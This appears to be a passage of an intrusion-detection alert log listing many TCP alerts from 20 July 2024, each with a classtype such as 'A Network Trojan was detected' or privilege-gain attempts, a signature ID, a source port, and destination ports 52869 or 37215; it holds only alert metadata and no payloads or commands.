                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.958012
                      SID:2025132
                      Source Port:54022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.958789
                      SID:2025132
                      Source Port:34538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.973674
                      SID:2027339
                      Source Port:59632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2829579
                      Source Port:44930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.202460
                      SID:2025132
                      Source Port:34558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.627950
                      SID:2829579
                      Source Port:53346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.575243
                      SID:2831300
                      Source Port:42752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:08.060226
                      SID:2025132
                      Source Port:34616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2829579
                      Source Port:36842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.342078
                      SID:2027339
                      Source Port:43166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.692772
                      SID:2025132
                      Source Port:58418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2027339
                      Source Port:33902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2831300
                      Source Port:58436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.477993
                      SID:2027339
                      Source Port:36854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.929504
                      SID:2831300
                      Source Port:50878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.367262
                      SID:2829579
                      Source Port:51814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2027339
                      Source Port:51260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.742007
                      SID:2025132
                      Source Port:56132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.101747
                      SID:2829579
                      Source Port:39634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.929510
                      SID:2831300
                      Source Port:34790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2025132
                      Source Port:39182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.649917
                      SID:2027339
                      Source Port:51110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2027339
                      Source Port:43584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.981798
                      SID:2025132
                      Source Port:44846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:50094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.575211
                      SID:2025132
                      Source Port:54852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2831300
                      Source Port:58786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2835222
                      Source Port:37942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:51608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.902217
                      SID:2025132
                      Source Port:47188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.124038
                      SID:2027339
                      Source Port:38838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2831300
                      Source Port:56114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2829579
                      Source Port:56228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.449442
                      SID:2027339
                      Source Port:41036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.255189
                      SID:2027339
                      Source Port:47746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.551203
                      SID:2025132
                      Source Port:49528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:50792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:39.471724
                      SID:2027339
                      Source Port:60972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.173875
                      SID:2027339
                      Source Port:38444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.181510
                      SID:2025132
                      Source Port:58738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2835222
                      Source Port:46748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.255022
                      SID:2025132
                      Source Port:55718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.319175
                      SID:2831300
                      Source Port:44250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.342520
                      SID:2027339
                      Source Port:50998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:50926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.741053
                      SID:2025132
                      Source Port:35270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.903875
                      SID:2027339
                      Source Port:41496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.523834
                      SID:2831300
                      Source Port:51016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.857159
                      SID:2829579
                      Source Port:56980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.204274
                      SID:2027339
                      Source Port:47144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.057445
                      SID:2027339
                      Source Port:55914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.016775
                      SID:2835222
                      Source Port:40562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.192346
                      SID:2831300
                      Source Port:43294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.482880
                      SID:2025132
                      Source Port:42508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.207276
                      SID:2027339
                      Source Port:58942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.347950
                      SID:2831300
                      Source Port:57498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2835222
                      Source Port:37000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.644546
                      SID:2831300
                      Source Port:57396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.905406
                      SID:2027339
                      Source Port:54116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.493635
                      SID:2027339
                      Source Port:53122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.350524
                      SID:2027339
                      Source Port:56026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.013524
                      SID:2025132
                      Source Port:46868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2831300
                      Source Port:60222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.324298
                      SID:2835222
                      Source Port:37440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2829579
                      Source Port:47806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.130228
                      SID:2027339
                      Source Port:33030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2835222
                      Source Port:57376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:37502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.313786
                      SID:2831300
                      Source Port:49104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.702462
                      SID:2025132
                      Source Port:60482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.636118
                      SID:2831300
                      Source Port:33580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.568828
                      SID:2025132
                      Source Port:42292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.275898
                      SID:2027339
                      Source Port:35274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:53270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055908
                      SID:2835222
                      Source Port:52822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.687825
                      SID:2831300
                      Source Port:45664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2835222
                      Source Port:33352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2829579
                      Source Port:60454
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:32874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.801044
                      SID:2025132
                      Source Port:35014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2025132
                      Source Port:59640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2831300
                      Source Port:57792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:56896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.953106
                      SID:2025132
                      Source Port:37928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.329971
                      SID:2025132
                      Source Port:45446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:36.969912
                      SID:2831300
                      Source Port:35792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.227686
                      SID:2025132
                      Source Port:42324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.773602
                      SID:2027339
                      Source Port:57862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2829579
                      Source Port:47408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.433517
                      SID:2027339
                      Source Port:48972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.367262
                      SID:2835222
                      Source Port:43460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.793654
                      SID:2025132
                      Source Port:43974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2025132
                      Source Port:60194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.201174
                      SID:2025132
                      Source Port:37750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.916755
                      SID:2027339
                      Source Port:40394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.280581
                      SID:2027339
                      Source Port:47142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.001261
                      SID:2027339
                      Source Port:33144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.299139
                      SID:2027339
                      Source Port:38898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.350524
                      SID:2025132
                      Source Port:37764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.001261
                      SID:2027339
                      Source Port:57986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.939285
                      SID:2027339
                      Source Port:59056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.889934
                      SID:2027339
                      Source Port:34334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.418646
                      SID:2831300
                      Source Port:36720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2835222
                      Source Port:46428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.532921
                      SID:2829579
                      Source Port:40020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.198496
                      SID:2831300
                      Source Port:51420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:56426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.692606
                      SID:2831300
                      Source Port:46080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.997704
                      SID:2025132
                      Source Port:33390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2829579
                      Source Port:42458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.242242
                      SID:2027339
                      Source Port:47824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2835222
                      Source Port:48774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.211571
                      SID:2025132
                      Source Port:57262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.903735
                      SID:2025132
                      Source Port:46430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2835222
                      Source Port:47084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.865859
                      SID:2025132
                      Source Port:33334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.165543
                      SID:2831300
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:02.655349
                      SID:2027339
                      Source Port:36218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.818180
                      SID:2025132
                      Source Port:47794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2025132
                      Source Port:51604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.819768
                      SID:2025132
                      Source Port:59374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.173548
                      SID:2027339
                      Source Port:36206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2829579
                      Source Port:60218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.588800
                      SID:2025132
                      Source Port:47172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.633204
                      SID:2027339
                      Source Port:52622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2027339
                      Source Port:47364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.150031
                      SID:2027339
                      Source Port:37840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.543463
                      SID:2027339
                      Source Port:50722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2835222
                      Source Port:48724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.539924
                      SID:2829579
                      Source Port:51024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.454256
                      SID:2025132
                      Source Port:51074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2829579
                      Source Port:57878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.674473
                      SID:2027339
                      Source Port:39664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:60330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.828517
                      SID:2027339
                      Source Port:50482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.201235
                      SID:2027339
                      Source Port:34860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.221858
                      SID:2027339
                      Source Port:38976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.633205
                      SID:2831300
                      Source Port:53738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2027339
                      Source Port:55604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.377287
                      SID:2027339
                      Source Port:44758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.507639
                      SID:2831300
                      Source Port:60430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.148043
                      SID:2027339
                      Source Port:33024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.544145
                      SID:2831300
                      Source Port:53730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.128245
                      SID:2831300
                      Source Port:49650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.733520
                      SID:2027339
                      Source Port:39418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.876678
                      SID:2027339
                      Source Port:37922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.057513
                      SID:2027339
                      Source Port:45828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.238802
                      SID:2027339
                      Source Port:58360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.744805
                      SID:2027339
                      Source Port:52332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.732595
                      SID:2027339
                      Source Port:44042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106701
                      SID:2025132
                      Source Port:59368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:25.713951
                      SID:2027339
                      Source Port:41892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.981798
                      SID:2027339
                      Source Port:54340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.903540
                      SID:2831300
                      Source Port:35102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.797449
                      SID:2831300
                      Source Port:37440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2025132
                      Source Port:36808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.804681
                      SID:2025132
                      Source Port:57068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.502843
                      SID:2027339
                      Source Port:56726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2831300
                      Source Port:57116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2025132
                      Source Port:50772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.438719
                      SID:2027339
                      Source Port:46728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.609530
                      SID:2027339
                      Source Port:49530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.003393
                      SID:2027339
                      Source Port:41894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.918922
                      SID:2027339
                      Source Port:43476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.437028
                      SID:2025132
                      Source Port:55636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:56622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2829579
                      Source Port:37146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2027339
                      Source Port:53012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2831300
                      Source Port:58328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.369729
                      SID:2831300
                      Source Port:36532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2027339
                      Source Port:33854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.927462
                      SID:2027339
                      Source Port:42682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.184196
                      SID:2027339
                      Source Port:51722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.709520
                      SID:2025132
                      Source Port:58988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.356049
                      SID:2027339
                      Source Port:41384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2027339
                      Source Port:35346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.260697
                      SID:2027339
                      Source Port:53358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.361407
                      SID:2027339
                      Source Port:38350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.556052
                      SID:2025132
                      Source Port:56476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.204856
                      SID:2027339
                      Source Port:54106
                      Destination Port:52869
                      Protocol:TCP
